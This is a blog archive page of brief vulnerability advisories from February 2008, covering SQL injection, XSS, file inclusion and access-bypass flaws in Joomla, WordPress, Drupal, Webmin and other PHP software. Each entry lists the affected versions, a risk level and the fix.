Archive

Archive for February, 2008

Joomla astatsPRO Component SQL Injection

February 22nd, 2008
Comments Off

Application: Joomla astatsPRO Component
Affected Version: 1.0.1 and other versions.
Vendor’s URL: Joomla astatsPRO Component
Bug Type: SQL Injection
Risk Level: Medium

Solution:
Edit the source code to ensure that input is properly sanitized.

Content Management, SQL Injection

PunBB Password Change and XSS

February 22nd, 2008
Comments Off

Application: PunBB
Affected Version: 1.2.16 and other versions.
Vendor’s URL: http://www.punbb.org/
Bug Type: Cross Site Scripting
Risk Level: Medium

Solution:
Update to version 1.2.17.

Cross Site Scripting, Discussion Boards

Joomla hwdVideoShare Component SQL Injection

February 22nd, 2008
Comments Off

Application: Joomla hwdVideoShare Component
Affected Version: version 1.1.3 and other versions.
Vendor’s URL: Joomla hwdVideoShare Component
Bug Type: SQL Injection
Risk Level: Critical

Solution:
Edit the source code to ensure that input is properly sanitized.

Content Management, SQL Injection

WordPress WP Photo Album Plugin “photo” SQL Injection

February 22nd, 2008
Comments Off

Application: WordPress WP Photo Album Plugin
Affected Version: 1.0 and prior versions.
Vendor’s URL: http://me.mywebsight.ws/web/wppa/
Bug Type: SQL Injection
Risk Level: Critical

Solution:
Update to version 1.1.

Content Management, SQL Injection

AuraCMS “albums” SQL Injection Vulnerability

February 22nd, 2008
Comments Off

Application: AuraCMS
Affected Version: 2.2.1 and other versions.
Vendor’s URL: http://www.auracms.org/
Bug Type: SQL Injection
Risk Level: Critical

Solution:
Apply the “Update Gallery” patch.

Content Management, SQL Injection

Drupal Header Image Module Security Bypass Vulnerability

February 22nd, 2008
Comments Off

Application: Drupal Header Image Module
Affected Version: Prior to 5.x-1.1.
Vendor’s URL: http://drupal.org/project/headerimage
Bug Type: Access Bypass
Risk Level: Medium

Solution:
Update to version 5.x-1.1.

Access Bypass, Content Management

freePHPgallery “lang” Local File Inclusion

February 22nd, 2008
Comments Off

Application: freePHPgallery
Affected Version: 0.6 and other versions.
Vendor’s URL: http://freephpgallery.mbod.net/
Bug Type: File inclusion
Risk Level: Critical

Solution:
Update to version 0.6.1.

File Inclusion, Image Galleries

WordPress Search Unleashed Plugin Script Insertion

February 22nd, 2008
Comments Off

Application: WordPress Search Unleashed Plugin
Affected Version: version 0.2.10.
Vendor’s URL: http://urbangiraffe.com/plugins/search-unleashed/
Bug Type: Cross Site Scripting
Risk Level: Medium

Solution:
Will be fixed in version 0.2.11.

Content Management, Cross Site Scripting

Joomla! mediaslide Component “albumnum” SQL Injection

February 22nd, 2008
Comments Off

Application: Joomla! mediaslide Component
Affected Version: 0.5 and other versions.
Vendor’s URL: http://www.kimwoodward.com/downloads.php
Bug Type: SQL Injection
Risk Level: Critical

Solution:
Edit the source code to ensure that input is properly sanitized.

Content Management, SQL Injection

Joomla! McQuiz Component “tid” SQL Injection

February 22nd, 2008
Comments Off

Application: Joomla! McQuiz Component
Affected Version: 0.9 Final and other versions.
Vendor’s URL: http://www.mcquizcomponent.com/
Bug Type: SQL Injection
Risk Level: Critical

Solution:
Edit the source code to ensure that input is properly sanitized.

Content Management, SQL Injection

Joomla! Quiz Component “tid” SQL Injection

February 22nd, 2008
Comments Off

Application: Joomla! Quiz Component
Affected Version: 0.81 and other versions.
Vendor’s URL: Joomla! Quiz Component
Bug Type: SQL Injection
Risk Level: Critical

Solution:
Edit the source code to ensure that input is properly sanitized.

Content Management, SQL Injection

WordPress DMSGuestbook Plugin Multiple Vulnerabilities

February 22nd, 2008
Comments Off

Application: WordPress DMSGuestbook Plugin
Affected Version: 1.8.0 and other versions.
Vendor’s URL: WordPress DMSGuestbook Plugin
Bug Type: Cross Site Scripting
Risk Level: Critical

Solution:
Edit the source code to ensure that input is properly sanitized.

Content Management, Cross Site Scripting

WordPress MU File Upload and Security Bypass

February 22nd, 2008
Comments Off

Application: WordPress MU
Affected Version: 1.3.1 and other versions.
Vendor’s URL: http://mu.wordpress.org/
Bug Type: Access Bypass
Risk Level: Critical

Solution:
Update to version 1.3.2 or later.

Access Bypass, Content Management

WordPress XML-RPC Post Edit Vulnerability

February 22nd, 2008
Comments Off

Application: WordPress
Affected Version: 2.3.2 and other versions.
Vendor’s URL: http://wordpress.org/
Bug Type: Access Bypass
Risk Level: Medium

Solution:
Update to version 2.3.3.

Access Bypass, Content Management

Webmin / Usermin “search” XSS

February 22nd, 2008
Comments Off

Application: Webmin / Usermin
Affected Version: Webmin version 1.390, Usermin version 1.320 and other versions.
Vendor’s URL: http://www.webmin.com/
Bug Type: Cross Site Scripting
Risk Level: Medium

Solution:
Update to Webmin 1.400 or Usermin 1.330.

Cross Site Scripting

PacerCMS “last_module” PHP Code Execution

February 22nd, 2008
Comments Off

Application: PacerCMS
Affected Version: 0.6.2 and other versions.
Vendor’s URL: http://pacercms.sourceforge.net/
Bug Type: Remote Code Execution
Risk Level: Critical

Solution:
Edit the source code to ensure that input is properly sanitized.

Content Management, Remote Command Execution

Joomla! XML-RPC / Blogger API Vulnerability

February 22nd, 2008
Comments Off

Application: Joomla! XML-RPC / Blogger API
Affected Version: 1.5 and other versions.
Vendor’s URL: http://www.joomla.org/
Bug Type: Manipulation of data
Risk Level: Medium

Solution:
Update to version 1.5.1.

Content Management

Simple Machines Forum SMF Shoutbox Mod Script Insertion

February 22nd, 2008
Comments Off

Application: Simple Machines Forum SMF
Affected Version: 1.16b and other versions.
Vendor’s URL: Simple Machines Forum SMF
Bug Type: Cross Site Scripting
Risk Level: Medium

Solution:
Edit the source code to ensure that input is properly sanitized.

Cross Site Scripting, Discussion Boards

Joomla! Rapid Recipe Component Two SQL Injection

February 22nd, 2008
Comments Off

Application: Joomla! Rapid Recipe Component
Affected Version: 1.6.5 and other versions.
Vendor’s URL: Joomla! Rapid Recipe Component
Bug Type: SQL Injection
Risk Level: Critical

Solution:
Update to version 1.6.7.

Content Management, SQL Injection

WordPress WP-Footnotes Plugin “admin_panel.php” XSS

February 22nd, 2008
Comments Off

Application: WordPress
Affected Version: 2.2 and other versions.
Vendor’s URL: WordPress WP-Footnotes Plugin
Bug Type: Cross Site Scripting
Risk Level: Medium

Solution:
Edit the source code to ensure that input is properly sanitized.

Content Management, Cross Site Scripting